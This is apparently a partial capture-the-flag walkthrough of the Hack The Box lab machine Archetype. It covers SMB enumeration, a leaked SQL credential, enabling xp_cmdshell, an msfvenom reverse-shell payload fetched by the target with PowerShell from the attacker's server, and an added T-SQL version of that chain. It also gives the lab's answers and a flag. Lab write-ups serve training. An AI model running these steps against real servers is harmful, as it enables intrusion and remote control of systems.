Hack The Box machine Archetype walkthrough (partial)
Target: Archetype
Difficulty: in my opinion this one is not trivial
The author uses Kali Linux as the penetration-testing platform. First establish the VPN connection to Hack The Box with openvpn; the Hack The Box page then shows the IP address of the Archetype instance, and the first step is a service scan of it with nmap:
#openvpn starting_point_jasonhuawen.ovpn
# nmap -sV 10.129.5.176
Task 1: Which TCP port is hosting a database server?
Approach: scan the target with nmap and read off the port on which the database service is listening:
# nmap -sV 10.129.5.176
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-03 00:49 EDT
Nmap scan report for 10.129.175.76
Host is up (0.22s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.98 seconds
1433/tcp is ms-sql-s, i.e. Microsoft SQL Server 2017.
Answer: 1433
Task 2: What is the name of the non-Administrative share available over SMB?
Approach: the nmap scan shows SMB (445/tcp) is open, so try to list the shares with smbclient (press Enter at the password prompt; the server accepts an empty password for the listing):
# smbclient -L 10.129.5.176
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
smbclient -L lists the shares. Names ending in $ are hidden shares; ADMIN$, C$ and IPC$ are the default administrative shares and need Administrator credentials to use. The only non-administrative share here is backups.
Answer: backups
Task 3: What is the password identified in the file on the SMB share?
Approach: connect to the backups share with smbclient. No password is needed; just press Enter at the prompt, since the share allows anonymous access:
#smbclient //10.129.5.176/backups
The share contains a single file. Download it and read it locally; it holds a username and a password:
# smbclient //10.129.5.176/backups
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 07:20:57 2020
  ..                                  D        0  Mon Jan 20 07:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020

                5056511 blocks of size 4096. 2605198 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> quit

┌──(root💀kali)-[~]
└─# cat prod.dtsConfig
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
prod.dtsConfig is an SSIS (SQL Server Integration Services) package configuration file; its ConnectionString property carries the database credentials in clear text, which is why a backup of it sitting on an anonymously readable share is enough to get a foothold:
Username: ARCHETYPE\sql_svc
Password: M3g4c0rp123
Answer: M3g4c0rp123
Task 4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
Approach: this task refers to the Impacket toolkit. I did not find it on my Kali install at first, but it is in fact packaged as python3-impacket, with the example scripts under /usr/share/doc/python3-impacket/examples (see the directory listing further down). Installing from source is also straightforward (the CoreSecurity repository below now redirects to github.com/fortra/impacket):
#git clone https://github.com/CoreSecurity/impacket.git
#cd impacket/
#python3 setup.py install
The task asks for an authenticated connection to Microsoft SQL Server, so the script is mssqlclient.py.
Next use Impacket's mssqlclient.py to connect to the SQL Server, with the username and password taken from the file downloaded over SMB. The -windows-auth flag selects Windows (NTLM) authentication, which is required because ARCHETYPE\sql_svc is a Windows account, not a SQL Server login:
#python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.5.176 -windows-auth
The connection to the database succeeds:
┌──(root💀kali)-[/usr/share/doc/python3-impacket/examples]
└─# ls
addcomputer.py  findDelegation.py   getST.py        lookupsid.py      nmapAnswerMachine.py  raiseChild.py     rpcmap.py       smbexec.py    split.py
atexec.py       GetADUsers.py       getTGT.py       mimikatz.py       ntfs-read.py          rbcd.py           sambaPipe.py    smbpasswd.py  ticketConverter.py
dcomexec.py     getArch.py          GetUserSPNs.py  mqtt_check.py     ntlmrelayx.py         rdp_check.py      samrdump.py     smbrelayx.py  ticketer.py
dpapi.py        Get-GPPPassword.py  goldenPac.py    mssqlclient.py    ping6.py              registry-read.py  secretsdump.py  smbserver.py  wmiexec.py
esentutl.py     GetNPUsers.py       karmaSMB.py     mssqlinstance.py  ping.py               reg.py            services.py     sniffer.py    wmipersist.py
exchanger.py    getPac.py           kintercept.py   netview.py        psexec.py             rpcdump.py        smbclient.py    sniff.py      wmiquery.py

┌──(root💀kali)-[/usr/share/doc/python3-impacket/examples]
└─# python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.5.176 -windows-auth
Impacket v0.9.25.dev1+20220323.180407.ff322697 - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
Answer: mssqlclient.py
Task 5:What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
Answer: xp_cmdshell (disabled by default; enabling it requires sysadmin rights on the instance, and once enabled it runs commands as the SQL Server service account)
Task 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?
Answer: winPEAS (the well-known Windows enumeration script that looks for local privilege-escalation paths: misconfigurations, stored credentials, writable services and the like)
Task 7: What file contains the administrator's password?
Approach: first get a reverse shell, then escalate privileges. Start by enabling xp_cmdshell from the mssqlclient.py prompt; enable_xp_cmdshell is a helper command of mssqlclient.py that issues the required sp_configure calls for you (this needs sysadmin rights):
SQL> enable_xp_cmdshell;
SQL> reconfigure
Next, set up the reverse shell. A payload has to be generated and placed on the target; generate it with msfvenom first:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.218 -f exe -o jason.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: jason.exe
10.10.14.218 is the address of Kali's tun interface after the VPN comes up; this is the address the reverse shell connects back to (LPORT is not given, so the payload uses the default 4444).
The key step now is getting the jason.exe payload onto the target.
Since xp_cmdshell executes commands on the target, use it to make the target download the payload: serve the directory containing jason.exe from Kali with Python's built-in http.server module, then fetch it from the target.
Choose a directory on the target that the SQL Server service account can write to and execute from, e.g. C:\Users\Public, and download the payload into it with PowerShell via xp_cmdshell (wget is a PowerShell alias for Invoke-WebRequest; the URL must point at Kali's current tun address, here 10.10.14.8):
SQL> xp_cmdshell "powershell wget http://10.10.14.8/jason.exe -OutFile c:\\Users\Public\\jason.exe"
The payload is now on the target.
Then start a handler on Kali (exploit/multi/handler with the same payload, LHOST and LPORT as used by msfvenom) and execute jason.exe on the target, again via xp_cmdshell. Note that the xp_cmdshell call blocks for as long as the process it started is running.
The reverse shell connects back to Kali Linux successfully.
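The same procedure written out as plain T-SQL, added here as an example that is not part of the original post. It shows what the enable_xp_cmdshell helper of mssqlclient.py does under the hood, checks the prerequisites before changing anything, captures command output into a table instead of relying on the client to print it, and reverts the setting afterwards. It can be pasted into any client connected as sql_svc. The web-server address 10.10.14.8, the file name jason.exe and the directory C:\Users\Public are the values used above; the sysadmin check and the output-capturing table are additions.

```sql
-- Only sysadmin (or a login holding ALTER SETTINGS) can change server options,
-- so check the privilege first rather than discovering it from an error.
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- Current state: value_in_use = 1 means xp_cmdshell is already enabled.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- xp_cmdshell is an "advanced option", so advanced options have to be exposed first.
-- RECONFIGURE applies the new value; without it the change stays pending.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Run a command and collect its output: xp_cmdshell returns one row per output line
-- plus a trailing NULL row, so capture into a table variable and filter the NULL.
DECLARE @out TABLE (line NVARCHAR(4000));
INSERT INTO @out EXEC xp_cmdshell 'whoami';
SELECT line FROM @out WHERE line IS NOT NULL;

-- Stage the payload: fetch it from the attacker's HTTP server (address from the
-- walkthrough above) into a directory the service account can write to.
-- Invoke-WebRequest is the cmdlet behind the "wget" alias used above.
EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.14.8/jason.exe -OutFile C:\Users\Public\jason.exe"';

-- Launch it. This call blocks while the reverse shell is alive, so issue it from a
-- second client session if further queries are still needed on this one.
EXEC xp_cmdshell 'C:\Users\Public\jason.exe';

-- Put the option back to its original value once the shell is no longer needed.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

The sys.configurations query is also the quickest check a defender can run: xp_cmdshell showing value_in_use = 1 on a server that has no business running OS commands is a finding in itself.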
Next prepare the privilege-escalation tool winPEAS. Download it to Kali (the x86 build matches the 32-bit payload generated above):
#wget https://github.com/carlospolop/PEASS-ng/releases/download/20220320/winPEASx86.exe
Then push winPEAS to the target with meterpreter's upload command and run it there:
User flag obtained: 3e7b102e78218e935bf3f4951fec21a3